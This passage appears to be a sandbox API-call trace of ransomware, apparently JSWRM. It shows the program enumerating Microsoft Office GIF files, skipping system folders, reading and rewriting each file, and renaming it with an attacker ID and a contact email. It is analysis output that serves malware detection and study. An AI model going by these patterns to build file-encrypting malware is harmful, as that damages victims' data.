lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR45B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir45b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.627] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8217) returned 1 [0119.627] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2010) returned 0x24e1d8 [0119.627] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2010, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2010, lpOverlapped=0x0) returned 1 [0119.631] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.631] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2010, lpOverlapped=0x0) returned 1 [0119.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.631] CloseHandle (hObject=0x314) returned 1 [0119.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0119.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0119.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0119.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.631] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR45B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir45b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR45B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir45b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0119.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.632] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ee9, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR45F.GIF", cAlternateFileName="")) returned 1 [0119.632] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2=".") returned 1 [0119.632] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2="..") returned 1 [0119.632] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2="...") returned 1 [0119.632] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2="windows") returned -1 [0119.632] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2="recovery") returned -1 [0119.632] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2="perflogs") returned -1 [0119.632] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2="documents and settings") returned 1 [0119.632] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.632] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2="system volume information") returned -1 [0119.633] lstrcmpiW (lpString1="PDIR45F.GIF", lpString2="msocache") returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR45F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR45F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR45F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR45F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR45F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR45F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0119.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR45F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir45f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.633] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7913) returned 1 [0119.634] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ee0) returned 0x24e1d8 [0119.634] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1ee0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1ee0, lpOverlapped=0x0) returned 1 [0119.635] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.635] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1ee0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1ee0, lpOverlapped=0x0) returned 1 [0119.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.636] CloseHandle (hObject=0x314) returned 1 [0119.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0119.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0119.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.636] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR45F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir45f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR45F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir45f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.637] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1349, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR46B.GIF", cAlternateFileName="")) returned 1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2=".") returned 1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2="..") returned 1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2="...") returned 1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2="windows") returned -1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2="recovery") returned -1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2="perflogs") returned -1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2="documents and settings") returned 1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2="system volume information") returned -1 [0119.637] lstrcmpiW (lpString1="PDIR46B.GIF", lpString2="msocache") returned 1 [0119.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0119.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR46B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR46B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR46B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0119.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0119.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR46B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR46B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR46B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0119.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR46B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir46b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.638] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4937) returned 1 [0119.638] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1340) returned 0x24e1d8 [0119.638] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1340, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1340, lpOverlapped=0x0) returned 1 [0119.642] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.642] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1340, lpOverlapped=0x0) returned 1 [0119.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.642] CloseHandle (hObject=0x314) returned 1 [0119.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0119.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0119.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0119.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.642] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR46B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir46b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR46B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir46b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0119.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.643] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1377, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR46F.GIF", cAlternateFileName="")) returned 1 [0119.643] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2=".") returned 1 [0119.643] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2="..") returned 1 [0119.643] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2="...") returned 1 [0119.643] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2="windows") returned -1 [0119.643] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2="recovery") returned -1 [0119.643] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2="perflogs") returned -1 [0119.643] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2="documents and settings") returned 1 [0119.643] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.644] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2="system volume information") returned -1 [0119.644] lstrcmpiW (lpString1="PDIR46F.GIF", lpString2="msocache") returned 1 [0119.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0119.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR46F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR46F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR46F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0119.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0119.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR46F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR46F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR46F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0119.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0119.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR46F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir46f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.682] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4983) returned 1 [0119.682] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1370) returned 0x24e1d8 [0119.682] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1370, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1370, lpOverlapped=0x0) returned 1 [0119.689] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.689] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1370, 